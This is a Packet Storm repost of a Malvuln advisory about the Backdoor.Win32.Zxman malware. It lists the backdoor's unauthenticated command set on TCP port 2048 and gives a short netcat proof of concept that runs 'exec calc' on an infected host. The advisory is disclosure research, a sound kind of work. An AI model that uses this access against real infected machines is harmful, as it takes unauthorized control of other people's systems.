exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Backdoor.Win32.Zxman MVID-2022-0478 Remote Command Execution

Backdoor.Win32.Zxman MVID-2022-0478 Remote Command Execution
Posted Feb 2, 2022
Authored by malvuln | Site malvuln.com

Backdoor.Win32.Zxman malware suffers from a remote command execution vulnerability.

tags | exploit, code execution
systems | windows
SHA-256 | e87ee1930af79b71dea8fcd56870bf395b7d81dd39d38f942b5c10853b0b7b84

Backdoor.Win32.Zxman MVID-2022-0478 Remote Command Execution

Change Mirror Download
Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/e369bbd8acbe8322834e3adbad30ff5c.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Zxman
Vulnerability: Unauthenticated Remote Command Execution
Description: The malware by "Zx-man" listens on TCP port 2048. Third-party attackers who can reach an infected system can run commands made available by the backdoor.

Commands List.

* ? or HELP - View this screen
* Exec FILE_NAME,COMMAND_LINE - Execute program or file
* Copy FILE_NAME_1,FILE_NAME_2 - Copies FILE_NAME_1 to FILE_NAME_2
* Move FILE_NAME_1,FILE_NAME_2 - Moves FILE_NAME_1 to FILE_NAME_2
* Rename FILE_NAME_1,FILE_NAME_2 - Renames FILE_NAME_1 to FILE_NAME_2
* Del FILE_NAME - Deletes a file
* View FILE_NAME - Viewes a file
* Autorun FILE_NAME - Add program to the autorun list
* Dir DIRECTORY - List DIRECTORY's files and subdirs
* Msg MESSAGE - Show a message
* Mouse [ON/OFF] - Turns mouse ON / OFF
* Reboot - Reboots the computer
* TurnOff [QUICK] - Turns off the computer
* Exit - Exit!!!

Type: PE32
MD5: e369bbd8acbe8322834e3adbad30ff5c
Vuln ID: MVID-2022-0478
Disclosure: 02/01/2022

Exploit/PoC:
nc64.exe x.x.x.x 2048
Welcome to REMOTE_CONTROL_SYSTEM by Zx-man (zx-man@ukr.net)
--------------------------------------------------------------------------------
Type ''?'' for HELP!
>exec calc
exec calc

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    14 Files
  • 15
    Oct 15th
    49 Files
  • 16
    Oct 16th
    28 Files
  • 17
    Oct 17th
    23 Files
  • 18
    Oct 18th
    10 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    5 Files
  • 22
    Oct 22nd
    12 Files
  • 23
    Oct 23rd
    23 Files
  • 24
    Oct 24th
    9 Files
  • 25
    Oct 25th
    10 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close